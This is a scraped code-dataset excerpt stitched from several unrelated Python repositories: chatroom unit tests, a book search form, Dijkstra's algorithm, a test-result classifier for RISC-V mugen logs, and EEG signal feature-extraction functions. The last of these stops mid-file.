image rose\", DT: DT_NOW, REPLY: {TYPE: None, DATA: None}},\n ]\n\n self.success_on_connect = [{SID: 5}]\n\n self.success_check_if_user_exists = [\n {EMAIL: \"s1@njit.edu\", RESULT: False},\n {EMAIL: \"harry@gmail.com\", RESULT: True},\n ]\n\n self.failure_check_if_user_exists = [{EMAIL: \"s1@njit.edu\", RESULT: False}]\n\n self.success_create_user_entry = [\n {EMAIL: \"s1@njit.edu\", NAME: \"sarah\", IMG: \"apple.png\"}\n ]\n\n self.success_get_supported_languages = [\n {\n LANG: {\"languages\": [{\"language_code\": \"af\"}, {\"language_code\": \"sq\"}]},\n RESULT: {\n \"languages\": [{\"language_code\": \"af\"}, {\"language_code\": \"sq\"}]\n },\n },\n {LANG: {\"languages\": []}, RESULT: None},\n ]\n\n self.failure_get_supported_languages = [\n {\n LANG: {\"languages\": [{\"language_code\": \"af\"}, {\"language_code\": \"sq\"}]},\n RESULT: None,\n }\n ]\n\n self.success_bot_image_search = [\n {\n MESSAGE: \"!! image flower\",\n RESPONSE: self.mock_image_search_json,\n RESULT: {\n DATA: \"https://cdn.pixabay.com/photo/2013/10/15/09/12/flower-195893_150.jpg\",\n TYPE: \"img\",\n },\n },\n {\n MESSAGE: \"!! image flower\",\n RESPONSE: self.mock_image_search_json_error,\n RESULT: {DATA: None, TYPE: \"img\"},\n },\n ]\n\n self.failure_bot_image_search = [\n {\n MESSAGE: \"!! image flower\",\n RESPONSE: self.mock_image_search_json,\n RESULT: {DATA: None, TYPE: \"img\"},\n }\n ]\n\n def test_record_message_success(self):\n for test in self.success_record_message:\n with patch(\"sqlalchemy.orm.session.Session.commit\") as commit, patch(\n \"sqlalchemy.orm.session.Session.add\"\n ) as add, patch(\"sqlalchemy.orm.session.Session.close\") as close:\n self.sc.recordMessage(\n test[EMAIL], test[MESSAGE], test[MSG_TYPE], test[DT]\n )\n add.assert_called_once()\n commit.assert_called_once()\n close.assert_called_once()\n\n def test_record_message_failure(self):\n for test in self.failure_record_message:\n with patch(\"sqlalchemy.orm.session.Session.commit\") as commit, patch(\n \"sqlalchemy.orm.session.Session.add\"\n ) as add, patch(\"sqlalchemy.orm.session.Session.close\") as close:\n add.side_effect = SQLAlchemyError()\n self.sc.recordMessage(\n test[EMAIL], test[MESSAGE], test[MSG_TYPE], test[DT]\n )\n add.assert_called_once()\n self.assertRaises(SQLAlchemyError)\n commit.assert_not_called()\n close.assert_called_once()\n\n def test_send_message_success(self):\n for test in self.success_send_message:\n with patch(\"flask_socketio.SocketIO.emit\") as mock_sock:\n self.sc.sendMessage(test[TAG], test[MESSAGE], test[ROOM])\n mock_sock.assert_called_once()\n\n def test_send_message_failure(self):\n for test in self.success_send_message:\n with patch(\"flask_socketio.SocketIO.emit\") as mock_sock:\n mock_sock.side_effect = ConnectionRefusedError\n self.sc.sendMessage(test[TAG], test[MESSAGE], test[ROOM])\n mock_sock.assert_called_once()\n self.assertRaises(ConnectionRefusedError)\n\n def test_update_room_count_success(self):\n for test in self.success_update_room_count:\n with patch(\"server_comms.ServerComms.sendMessage\") as mock_send:\n mock_send.return_value = True\n self.sc.room_count = test[COUNT]\n self.sc.updateRoomCount(test[CHANGE])\n result = self.sc.room_count\n expected = test[RESULT]\n self.assertEqual(result, expected)\n\n def test_received_message(self):\n for test in self.success_received_message:\n with patch(\"server_comms.ServerComms.recordMessage\") as rec_mess, patch(\n \"server_comms.ServerComms.sendMessage\"\n ) as send_mess, patch(\n \"server_comms.ServerComms.chatBotResponse\"\n 
) as chat_resp, patch(\n \"helper_functions.determineMessageType\"\n ) as dmt:\n dmt.return_value = test[DATA][MSG_TYPE]\n self.sc.receivedNewMessage(test[DATA])\n dmt.assert_called_once()\n rec_mess.assert_called_once()\n send_mess.assert_called_once()\n chat_resp.assert_called_once()\n\n def test_chatbot_response_success(self):\n for test in self.success_chatbot_response:\n with patch(\"server_comms.ServerComms.recordMessage\") as rec_mess, patch(\n \"server_comms.ServerComms.sendMessage\"\n ) as send_mess, patch(\"bot.Bot.messageRead\") as mess_read:\n mess_read.return_value = test[REPLY]\n self.sc.chatBotResponse(test[MSG], self.chatBot)\n rec_mess.assert_called_once()\n send_mess.assert_called_once()\n\n def test_chatbot_response_failure(self):\n for test in self.failure_chatbot_response:\n with patch(\"server_comms.ServerComms.recordMessage\") as rec_mess, patch(\n \"server_comms.ServerComms.sendMessage\"\n ) as send_mess, patch(\"bot.Bot.messageRead\") as mess_read, patch(\n \"server_comms.ServerComms.createMessage\"\n ) as create_mess, patch(\n \"datetime.datetime\"\n ) as dt:\n mess_read.return_value = test[REPLY]\n dt.now.return_value = test[DT]\n if test[REPLY][TYPE] == None:\n self.sc.chatBotResponse(test[MSG], self.chatBot)\n rec_mess.assert_not_called()\n send_mess.assert_not_called()\n create_mess.assert_not_called()\n elif test[REPLY][DATA] == None:\n self.sc.chatBotResponse(test[MSG], self.chatBot)\n rec_mess.assert_called_once()\n send_mess.assert_called_once()\n create_mess.assert_called_once_with(\n test[ERR_MSG],\n self.chatBot.name,\n self.chatBot.name,\n str(test[DT]),\n \"text\",\n self.chatBot.img,\n )\n\n def query_messages(self, q):\n query = MagicMock()\n if repr(q) == repr(models.Message):\n query.all = mock.Mock(return_value=self.mock_messages)\n elif repr(q) == repr(models.Username):\n query.all = mock.Mock(return_value=self.mock_users)\n return query\n\n def test_on_connect_success(self):\n for test in self.success_on_connect:\n with patch(\"sqlalchemy.orm.session.Session.query\") as query, patch(\n \"sqlalchemy.orm.session.Session.close\"\n ) as close, patch(\n \"server_comms.ServerComms.sendMessage\"\n ) as send_mess, patch(\n \"server_comms.ServerComms.updateRoomCount\"\n ) as update_room:\n query.side_effect = self.query_messages\n self.sc.onConnect(test[SID])\n self.assertEqual(query.call_count, 2)\n close.assert_called_once()\n send_mess.assert_called_once()\n update_room.assert_called_once()\n\n def checkIfUser(self, user):\n filter_mock = MagicMock()\n email = user.get_children()[1].value\n for user in self.mock_users:\n if user.email == email:\n filter_mock.first.return_value = True\n return filter_mock\n filter_mock.first.return_value = None\n return filter_mock\n\n def test_check_if_users_exists_success(self):\n for test in self.success_check_if_user_exists:\n with patch(\"sqlalchemy.orm.session.Session\") as sessLocal:\n sessLocal.return_value.query.return_value.filter.side_effect = (\n self.checkIfUser\n )\n result = hf.checkIfUserExists(sessLocal, test[EMAIL])\n expected = test[RESULT]\n self.assertEqual(result, expected)\n\n def test_check_if_users_exists_failure(self):\n for test in self.failure_check_if_user_exists:\n with patch(\"sqlalchemy.orm.session.Session\") as sessLocal:\n sessLocal.return_value.query.side_effect = SQLAlchemyError()\n hf.checkIfUserExists(sessLocal, test[EMAIL])\n self.assertRaises(SQLAlchemyError)\n\n def test_create_user_entry_success(self):\n for test in self.success_create_user_entry:\n with 
patch(\"sqlalchemy.orm.session.Session\") as sessLocal:\n hf.createNewUserEntry(sessLocal, test[EMAIL], test[NAME], test[IMG])\n sessLocal.return_value.add.assert_called_once()\n sessLocal.return_value.commit.assert_called_once()\n sessLocal.return_value.close.assert_called_once()\n\n def test_get_supported_languages_success(self):\n for test in self.success_get_supported_languages:\n with patch(\"google.cloud.translate.\" \"TranslationServiceClient\") as client:\n client.get_supported_languages.return_value.languages = test[LANG][\n \"languages\"\n ]\n client.get_supported_languages.return_value.values = test[LANG]\n result = bhf.getSupportedLanguages(client, 1)\n if result != None:\n result = result.values\n expected = test[RESULT]\n self.assertEqual(result, expected)\n\n def test_get_supported_languages_failure(self):\n for test in self.failure_get_supported_languages:\n with patch(\"google.cloud.translate.\" \"TranslationServiceClient\") as client:\n client.get_supported_languages.side_effect = Exception()\n result = bhf.getSupportedLanguages(client, 1)\n expected = test[RESULT]\n self.assertEqual(result, expected)\n self.assertRaises(Exception)\n\n def test_bot_image_search_success(self):\n for test in self.success_bot_image_search:\n with patch(\"bot.requests\") as requests, patch(\"bot.random\") as random:\n random.randint.return_value = 0\n requests.get.return_value.value = test[RESPONSE]\n requests.get.return_value.json.return_value = (\n requests.get.return_value.value\n )\n result = self.chatBot.messageRead(test[MESSAGE])\n expected = test[RESULT]\n self.assertDictEqual(result, expected)\n\n def test_bot_image_search_failure(self):\n for test in self.failure_bot_image_search:\n with patch(\"bot.requests\") as requests, patch(\"bot.random\") as random:\n random.randint.return_value = 0\n requests.get.side_effect = Exception()\n result = self.chatBot.messageRead(test[MESSAGE])\n expected = test[RESULT]\n self.assertDictEqual(result, expected)\n self.assertRaises(Exception)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"sb989/Chatroom_Project","sub_path":"tests/mocked_unit_tests.py","file_name":"mocked_unit_tests.py","file_ext":"py","file_size_in_byte":17142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"294521270","text":"from django import forms\nfrom haystack.forms import SearchForm\nimport re\nfrom pyaws import ecs\nimport settings\n\nclass BookSearchForm(SearchForm):\n def __init__(self, *args, **kwargs):\n super(BookSearchForm, self).__init__(*args, **kwargs)\n self.ISBN = None\n self.title = None\n \n def search(self):\n \"\"\"\n Does actual search.\n \n Returns a two element tuple. First one is the site search results. 
Second is amazon results.\n \"\"\"\n \n query = self.cleaned_data['q']\n self.title = query\n \n if self.is_valid():\n local_books_title = self.searchqueryset.auto_query(self.title)\n local_books_query = self.searchqueryset.auto_query(query)\n \n local_books = local_books_query\n # if title query returned more results make that local_books\n if len(local_books_title) > len(local_books_query):\n local_books = local_books_title\n \n return local_books\n else:\n return None\n \n def is_query_ISBN(self):\n \"\"\"\n Returns True if query is an ISBN number, otherwise False.\n Also sets self.ISBN to be just the plain number.\n \"\"\"\n query = self.cleaned_data['q']\n \n # ISBN can contain: numbers, spaces, tabs, x or X, dashes, and underscores.\n if re.search(r'[^0-9 \\txX\\-_]', query):\n return False\n else:\n self.ISBN = re.sub(r'[^0-9xX]', '', query)\n return True\n ","repo_name":"hgezim/GizmoBooks","sub_path":"src/gizmolab/search/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74772422546","text":"from sys import stdin\nimport numpy as np\n\nN = int(stdin.readline().rstrip())\nX = [[int(x) for x in stdin.readline().rstrip().split()] for _ in range(N)]\n\ninf = 10 ** 7\nadjacent_array = np.full((N, N), inf)\nd = np.full(N, inf)\ncolor = ['white'] * N\np = np.zeros(N)\nmincost = inf\n\nfor k in range(N):\n for l in [2 * x + 3 for x in range(int((len(X[k]) - 2) / 2))]:\n adjacent_array[k][X[k][l - 1]] = X[k][l]\n\n\ndef dijkstra(s):\n d[s] = 0\n p[s] = -1\n u = 0\n global mincost\n\n while True:\n mincost = inf\n for i in range(N):\n if (color[i] != 'black') & (d[i] < mincost):\n mincost = d[i]\n u = i\n if mincost == inf:\n break\n print(str(u) + ' ' + str(mincost))\n color[u] = 'black'\n for v in range(N):\n if (color[v] != 'black') & (adjacent_array[u][v] < inf):\n if d[u] + adjacent_array[u][v] < d[v]:\n d[v] = d[u] + adjacent_array[u][v]\n p[v] = u\n color[v] = 'gray'\n\n\ndijkstra(0)\n","repo_name":"KouheiFurukawa/atcoder-back-number","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27150378226","text":"\"\"\"\t\nMacaque Simulation Project\nAdeesha Ekanayake \n5/12/2013\n\ncommon.py\n---------\nCommon methods\n\"\"\"\n\ndef read_CSV(inputValue):\n\t\"\"\"\n\treads passed in string in csv format into an array of values. Deals with\n\tpossibility of csv values in an excel cell\n\n\tparameters\n\t----------\n\tinputString: raw input string. 
Can be 1 value or multiple values\n\n\treturns\n\t-------\n\tarray of elements\n\t\"\"\"\n\tif inputValue == '':\n\t\treturn []\n\n\telif isinstance(inputValue, basestring): \n\n\t\t#make sure input is not empty cell\n\t\tsplit_array = inputValue.split(',')\n\n\t\t#if int(x) was used instead of int(float(x)) a valueError is thrown\n\t\tint_array = [int(float(x)) for x in split_array] \n\n\telse:\n\t\tint_array = []\n\t\tint_array.append(int(inputValue)) #make it int to keep type consistent\n\n\treturn int_array\n\n\n","repo_name":"adeeshaek/primate-social-network","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15920166296","text":"import os , json , csv\nimport result_parser\nimport combination_parser\n\nclass testRes():\n def __init__(self , workingDir , curCsv=None):\n self.workingDir = workingDir\n self.logsDir = workingDir + '/logs'\n self.failedLogsDir = workingDir + '/logs_failed'\n self.suite2casesDir = workingDir + '/suite2cases_out'\n self.testResult = []\n self.curCsv = None\n if curCsv is not None:\n if curCsv[0] != '/':\n curCsv = os.path.join('.' , curCsv)\n if os.path.exists(curCsv):\n self.csvtestResult = {}\n self.curCsv = curCsv\n self.totalCaseNum, self.totalPassedCaseNum, self.totalFailedCaseNum = 0, 0, 0\n\n def resPick(self):\n allSuites = os.listdir(self.logsDir)\n withFailedSuites = os.listdir(self.failedLogsDir)\n for suite in allSuites:\n if suite not in withFailedSuites:\n for case in os.listdir(self.logsDir+'/'+suite):\n if self.csvtestResult.get(case , None) is not None and self.csvtestResult[case]['status'] == 'success':\n self.testResult.append({'suite name':suite , 'case name':case , 'status':'success' , 'reason':self.csvtestResult[case]['reason']})\n else:\n self.testResult.append({'suite name':suite , 'case name':case , 'status':'success'})\n \n \n\n def csvRead(self):\n if self.curCsv is not None:\n with open(self.curCsv , 'r') as f:\n rows = csv.reader(f)\n rows = [row for row in rows]\n rows = rows[1:]\n keys = ['suite name' , 'case name' , 'status' , 'logFile' , 'reason']\n for row in rows:\n self.csvtestResult[row[1]] = dict(zip(keys , row))\n\n def exprotToCsv(self, filename = 'failureCause.csv'):\n csvfile = open('./'+filename,'w')\n cw = csv.writer(csvfile,lineterminator = '\\n')\n title = ['测试套/软件包名','测试用例名','状态','日志文件','原因']\n row = []\n row.append(title)\n ran = range(len(self.testResult))\n suite = ''\n for i in ran:\n if len(row) == 1 or suite != self.testResult[i]['suite name']:\n suiteName = self.testResult[i]['suite name']\n else:\n suiteName = ''\n if self.testResult[i]['suite name'] != '':\n suite = self.testResult[i]['suite name']\n if self.testResult[i].get('reason' , None) is not None:\n reason = self.testResult[i]['reason']\n elif self.testResult[i]['status'] == 'x86 fail':\n reason = 'x86 fail'\n elif self.testResult[i]['status'] == 'success':\n reason = 'None'\n else:\n reason = ''\n logfile = sorted(os.listdir(self.logsDir+'/'+suite+'/'+self.testResult[i]['case name']))[0]\n logPath = self.logsDir+'/'+suite+'/'+self.testResult[i]['case name']+'/'+logfile\n row.append([suiteName , self.testResult[i]['case name'] , self.testResult[i]['status'] , logPath , reason])\n cw.writerows(row)\n csvfile.close()\n\n def exportToMarkdown(self , filename = 'table.md'):\n with open(filename, \"w\") as md_file:\n title = ['测试套/软件包名','测试用例名','状态','日志文件','原因']\n md_file.write(\"| \")\n for header in 
title:\n md_file.write(header + \" | \")\n md_file.write(\"\\n\")\n md_file.write(\"| \")\n for header in title:\n md_file.write(\":---: | \")\n md_file.write(\"\\n\")\n ran = range(len(self.testResult))\n step = -1\n suite = ''\n for i in ran:\n if self.testResult[i]['suite name'] != '':\n suite = self.testResult[i]['suite name']\n if (i+step < 0 or i+step >= len(self.testResult)) or self.testResult[i+step]['suite name'] != self.testResult[i]['suite name']:\n suiteName = self.testResult[i]['suite name']\n else:\n suiteName = ''\n if self.testResult[i].get('reason' , None) is not None:\n reason = self.testResult[i]['reason']\n elif self.testResult[i]['status'] == 'success' :\n reason = 'None'\n elif self.testResult[i]['status'] == 'x86 fail':\n reason = 'x86 fail'\n else:\n reason = ''\n logfile = sorted(os.listdir(self.logsDir+'/'+suite+'/'+self.testResult[i]['case name']))[0]\n logPath = self.logsDir+'/'+suite+'/'+self.testResult[i]['case name']+'/'+logfile\n md_file.write('| '+suiteName+' | '+self.testResult[i]['case name']+' | '+self.testResult[i]['status']+' | ['+logPath+']('+logPath+') | '+reason+' |\\n')\n\n \n def statNum(self):\n self.totalCaseNum = len(self.testResult)\n for case in self.testResult:\n if case['status'] == 'success':\n self.totalPassedCaseNum += 1\n self.totalFailedCaseNum = self.totalCaseNum - self.totalPassedCaseNum\n\n \n\n\ndef findRealFail(riscv:testRes , x86:testRes):\n riscvFailedSuite = os.listdir(riscv.failedLogsDir)\n x86FailedSuite = os.listdir(x86.failedLogsDir)\n x86Suite = os.listdir(x86.logsDir)\n module = testRes('mugen-riscv')\n command = testRes('mugen-riscv')\n suite = ''\n retest = combination_parser.combination()\n for suite in riscvFailedSuite:\n for case in os.listdir(riscv.logsDir+'/'+suite):\n if case not in os.listdir(riscv.failedLogsDir+'/'+suite):\n if riscv.csvtestResult.get(case , None) is not None and riscv.csvtestResult[case]['status'] == 'success':\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'success' , 'reason':riscv.csvtestResult[case]['reason']})\n else:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'success'})\n if suite not in x86FailedSuite:\n for case in os.listdir(riscv.failedLogsDir+'/'+suite):\n if case not in x86Suite:\n if riscv.csvtestResult.get(case , None) is not None:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail_x86NotTest' , 'reason':riscv.csvtestResult[case]['reason']})\n else:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail_x86NotTest'})\n else: \n if riscv.csvtestResult.get(case , None) is not None:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':riscv.csvtestResult[case]['reason']})\n else:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail'})\n else:\n for case in os.listdir(riscv.failedLogsDir+'/'+suite):\n if case in os.listdir(x86.failedLogsDir+'/'+suite):\n if riscv.csvtestResult.get(case , None) is not None and riscv.csvtestResult[case]['status'] == 'x86 fail':\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'x86 fail' , 'reason':riscv.csvtestResult[case]['reason']})\n else:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'x86 fail'})\n for case in os.listdir(riscv.failedLogsDir+'/'+suite):\n if case not in os.listdir(x86.failedLogsDir+'/'+suite):\n reason = None\n fileData = None\n fliter = result_parser.classifier('catalog.json')\n logfile = 
sorted(os.listdir(riscv.logsDir+'/'+suite+'/'+case))[0]\n with open(riscv.logsDir+'/'+suite+'/'+case+'/'+logfile , 'r' , encoding=\"ISO-8859-1\") as f:\n fileData = f.read().split('\\n')\n if riscv.csvtestResult.get(case , None) is not None:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':riscv.csvtestResult[case]['reason']})\n reason = riscv.csvtestResult[case].get('reason' , [])\n else:\n reason = fliter.checkErrorType(fileData)\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':'/'.join(reason)})\n if 'timeout' in reason:\n retest.add_case(suite , case)\n if 'kernel module absent' in reason:\n for line in fileData:\n if line.find('Module') != -1:\n module.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':line})\n break\n if 'file missing' in reason or 'preinstall absent' in reason :\n retest.add_case(suite , case)\n for line in fileData:\n if line.find('command not found') != -1 or line.find('.service not found') != -1 or line.find('No such file or directory') != -1:\n command.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':line})\n \n \n module.exprotToCsv('module_failure.csv')\n command.exprotToCsv('command.csv')\n retest.export_every_json()\n\n\n\nif __name__ == '__main__':\n riscv = testRes('./mugen-riscv' , 'failureCause.csv')\n x86 = testRes('./mugen-x86')\n riscv.resPick()\n riscv.csvRead()\n findRealFail(riscv , x86)\n riscv.exprotToCsv()\n riscv.exportToMarkdown()","repo_name":"KotorinMinami/res_list","sub_path":"res_list.py","file_name":"res_list.py","file_ext":"py","file_size_in_byte":10007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13300786944","text":"import numpy as np\nimport pickle\nimport sys\n# import os\n# os.chdir('C:/Users/tbapt/Desktop/Documents/Ecole/3A/Machine_learning/DREEM_PROJECT')\n\n## Auxiliary functions\ndef meanOfInterval(signal, freq_min, freq_max):\n return np.average(signal[freq_min:freq_max])\n \ndef buildIntervals(list_length, interval_width):\n return list([i, i+interval_width] for i in range(0,list_length,interval_width))\n\ndef mobilMean(signal , interval_width): #use an odd number as interval_width, otherwise the width will be interval_width + 1.\n # side_interval = interval_width//2\n # return list( np.average( signal[ max(i-side_interval , 0) : min( i+side_interval+1 , len(signal))]) for i in range(len(signal)) )\n cumsum = np.cumsum(np.insert(signal, 0, 0)) \n return (cumsum[interval_width:] - cumsum[:-interval_width]) / float(interval_width)\n\n\n## methodOne(s) : feature-extraction methods\n\ndef distanceMinMaxOne( list_freq = None , param = None , rep_dim_feature_per_signal = False): # param = [ interval_width ]\n # Returns the sum of distances between the minimum and the maximum on a given set of intervals. 
Intended to be used with the temporal signal\n if rep_dim_feature_per_signal:\n return 1\n interval_width, = param\n i_max = len(list_freq)//interval_width\n return [ sum( np.linalg.norm( np.array([np.argmax(list_freq[i*interval_width:(i+1)*interval_width]) , max(list_freq[i*interval_width:(i+1)*interval_width])]) - np.array( [np.argmin(list_freq[i*interval_width:(i+1)*interval_width]) , min(list_freq[i*interval_width:(i+1)*interval_width])]) ) for i in range(i_max) ) ] \n\ndef maxAmpOne(list_freq = None, param = None , rep_dim_feature_per_signal = False): # param useless\n # Returns the maximum amplitude of a list of frequencies\n if rep_dim_feature_per_signal:\n return 1\n return [max(list_freq)]\n\n\ndef freqMinLimitAmpOne(list_freq = None, param = None , rep_dim_feature_per_signal = False): # param = [amp_lim]\n # Returns the (minimum) frequency above which all frequencies have amplitude < amp_lim = param[0]\n if rep_dim_feature_per_signal:\n return 1\n \n amp_lim, = param\n normalized_list_freq = 1/max(abs(list_freq))*list_freq\n for i in range(len(normalized_list_freq)-1,-1,-1):\n if normalized_list_freq[i] > amp_lim:\n return [i+1]\n return [0]\n\n\n\ndef nbPikesOne(list_freq = None, param = None , rep_dim_feature_per_signal = False ): #param = [interval_width, amp_lim]\n # Returns the number of frequency pikes for a given (amp_lim) amplitude, averaging with a mobile mean\n if rep_dim_feature_per_signal:\n return 1\n interval_width, amp_lim = param\n mobil_mean_list_freq = mobilMean(list_freq , interval_width)\n mobil_mean_list_freq = 1/max(abs(mobil_mean_list_freq))*mobil_mean_list_freq\n nb_pikes = 0\n # is_interval_in_a_pike = [False , False]\n # for i in range(len(mobil_mean_list_freq)):\n # if mobil_mean_list_freq[i] > amp_lim:\n # is_interval_in_a_pike = [True , is_interval_in_a_pike[0] ]\n # else:\n # is_interval_in_a_pike = [False , is_interval_in_a_pike[0] ]\n # if not(is_interval_in_a_pike[1]) and is_interval_in_a_pike[0]:\n # nb_pikes+=1\n \n is_interval_in_a_pike = 4 #code : 1 = [T,T] , 2 = [T,F] , 3 = [F,T] , 4 = [F,F]\n for i in range(len(mobil_mean_list_freq)):\n if mobil_mean_list_freq[i] > amp_lim:\n is_interval_in_a_pike = 1 if is_interval_in_a_pike in [1,2] else 2\n else:\n is_interval_in_a_pike = 3 if is_interval_in_a_pike in [1,2] else 4\n if is_interval_in_a_pike==2:\n nb_pikes+=1\n return [nb_pikes]\n\n\ndef nbPikesFastOne(list_freq = None, param = None , rep_dim_feature_per_signal = False ): #param = [interval_width, amp_lim]\n # Returns the number of frequency pikes for a given (amp_lim) amplitude, averaging over an interval\n if rep_dim_feature_per_signal:\n return 1\n interval_width, amp_lim = param\n intervals = buildIntervals(len(list_freq), interval_width)\n normalized_list_freq = 1/max(abs(list_freq))*list_freq\n nb_pikes = 0\n is_interval_in_a_pike = [False , False]\n # for minim, maxim in intervals:\n # mean_value = meanOfInterval(list_freq, minim, maxim)\n # if mean_value > amp_lim:\n # is_interval_in_a_pike = [True , is_interval_in_a_pike[0] ]\n # else:\n # is_interval_in_a_pike = [False , is_interval_in_a_pike[0] ]\n # if not(is_interval_in_a_pike[1]) and is_interval_in_a_pike[0]:\n # nb_pikes+=1\n \n is_interval_in_a_pike = 4 #code : 1 = [T,T] , 2 = [T,F] , 3 = [F,T] , 4 = [F,F]\n for minim, maxim in intervals:\n mean_value = meanOfInterval(normalized_list_freq, minim, maxim)\n if mean_value > amp_lim:\n is_interval_in_a_pike = 1 if is_interval_in_a_pike in [1,2] else 2\n else:\n is_interval_in_a_pike = 3 if is_interval_in_a_pike in [1,2] else 
4\n if is_interval_in_a_pike==2:\n nb_pikes+=1\n return [nb_pikes]\n\n\ndef indexMaxAmpOne(list_freq = None , param = None , rep_dim_feature_per_signal = False): # param = [ interval_width ]\n # Give the index of maximum amplitude, for the data averaged with a mobile mean of size interval_width\n if rep_dim_feature_per_signal:\n return 1\n interval_width, = param\n mobil_mean_list_freq = mobilMean(list_freq , interval_width)\n return [np.argmax(mobil_mean_list_freq)]\n\ndef indexMaxAmpFastOne(list_freq = None , param = None , rep_dim_feature_per_signal = False): # param = [ interval_width ]\n # Give the index of maximum amplitude, for the data averaged over fixed intervals. Probably way faster than indexMaxAmpOne, though less accurate.\n if rep_dim_feature_per_signal:\n return 1\n interval_width, = param\n i_max = len(list_freq)//interval_width\n #side_interval = interval_width//2\n list_mean = list( np.average( list_freq[i*interval_width:(i+1)*interval_width]) for i in range(i_max) )\n return [ np.argmax(list_mean)*interval_width + interval_width//2 ]\n\n\ndef meanDiffNeighbOne(list_freq = None , param = None , rep_dim_feature_per_signal = False): #param = [interval_width] (for moving mean)\n # Returns the average of absolute difference of amplitude between all neighbours frequencies\n if rep_dim_feature_per_signal:\n return 1\n \n interval_width, = param\n moving_mean_list = mobilMean(list_freq , interval_width) if interval_width>1 else list_freq.copy()\n return [np.average(list(abs(moving_mean_list[i+1]-moving_mean_list[i]) for i in range(len(moving_mean_list)-1)))]\n\n\n \ndef stdDeviationNbOne(list_freq = None , param = None , rep_dim_feature_per_signal = False ): #param = [ n_nb ]\n # Returns the average of standard deviations computed on a given number of points (separation of x-axis in intervals of the same length)\n if rep_dim_feature_per_signal:\n return 1\n n_nb, = param\n c_max = len(list_freq)//n_nb\n return [np.average(list(np.std(list_freq[c*n_nb:(c+1)*n_nb]) for c in range(c_max)))]\n\n \ndef upperRightOne(list_freq = None , param = None , rep_dim_feature_per_signal = False): # param = [th_amp , th_freq]\n # Returns the number of points in the upper right corner, defined by the parameters\n # Consider returning TRUE iff there are more than a given number of points in the upper right corner\n if rep_dim_feature_per_signal:\n return 1\n \n normalized_list_freq = 1/max(abs(list_freq))*list_freq\n th_amp , th_freq = param\n index_th_freq = int(th_freq*(len(list_freq)-1))\n \n \n return([len(([amp for amp in normalized_list_freq[index_th_freq:] if amp > th_amp]))])\n \n #return [max(normalized_list_freq[index_th_freq:-1])>th_amp]\n\ndef meanOne(list_time = None , param = None , rep_dim_feature_per_signal = False): # param is useless\n # Returns the mean of the signal\n if rep_dim_feature_per_signal:\n return 1\n return [np.mean(list_time)]\n\ndef meanOfAbsOne(list_time = None , param = None , rep_dim_feature_per_signal = False): # param is useless\n # Returns the mean of the signal's absolute value\n if rep_dim_feature_per_signal:\n return 1\n\n return [np.mean(np.abs(list_time))]\n \ndef maxOfAbsOne(list_time = None , param = None , rep_dim_feature_per_signal = False): # param is useless\n # Returns the max of the signal's absolute value\n if rep_dim_feature_per_signal:\n return 1\n\n return [np.max(np.abs(list_time))]\n\ndef minOfAbsOne(list_time = None , param = None , rep_dim_feature_per_signal = False): # param is useless\n # Returns the min of the signal's 
absolute value\n if rep_dim_feature_per_signal:\n return 1\n\n return [np.min(np.abs(list_time))]\n\n'''def methodTestOne(list_freq = None, param = None, rep_dim_feature_per_signal = False): # param useless\n # Pointless method to test extractFeatureAll\n if rep_dim_feature_per_signal:\n return 2\n \n return np.array([1,2])'''\n\n## Global feature-extraction methods\n \ndef extractFeatureAll(h5file_freq , methodOne , param , list_bool_extract_signal):\n # Method giving the design matrix of h5file, given a certain method\n # list_bool_extract_signal[i] contains 1 iff the ith signal (data field) must have its feature extracted for this methodOne. Must be of length : len(key_list)\n key_list = list(h5file_freq.keys())\n key_list_extract = list( key_list[i] for i in range(len(key_list)) if list_bool_extract_signal[i] )\n nb_samples = len(h5file_freq[key_list[0]])\n dim_feature_per_signal = methodOne(rep_dim_feature_per_signal = True)\n rep = np.zeros((nb_samples , len(key_list_extract)*dim_feature_per_signal))\n \n for k_id in range(len(key_list_extract)):\n k=key_list_extract[k_id]\n rep[: ,k_id*dim_feature_per_signal:(k_id+1)*dim_feature_per_signal ] = np.array( list(methodOne(h5file_freq[k][i] , param) for i in range(nb_samples) ))\n return rep\n\ndef extractMultiFeatureAll(h5file_freq , list_methodOne , list_param , mat_bool_extract_signal , save = False , name_save = None):\n # Returns the concatenation of design matrices for a list of methods\n # mat_bool_extract_signal[i] (ith row) contains list_bool_extract_signal for extractFeatureAll function. IE : mat_bool_extract_signal[i,j] is 1 iff for ith methodOne, jth signal must have its feature extracted. \n # mat_bool_extract_signal must be of size : (nb of methodOnes , len(key_list) )\n key_list = list(h5file_freq.keys())\n nb_samples = len(h5file_freq[list(h5file_freq.keys())[0]])\n #sum_dim_feature_per_signal = sum( methodOne(rep_dim_feature_per_signal = True) for methodOne in list_methodOne )\n \n list_key_list_extract = list( list( key_list[j] for j in range(len(key_list)) if mat_bool_extract_signal[i,j] ) for i in range(len(list_methodOne)) )\n \n sum_weighted_dim_feature_per_signal = sum( list_methodOne[i](rep_dim_feature_per_signal = True)*len(list_key_list_extract[i]) for i in range(len(list_methodOne)) )\n \n rep = np.zeros((nb_samples , sum_weighted_dim_feature_per_signal ))\n \n c = 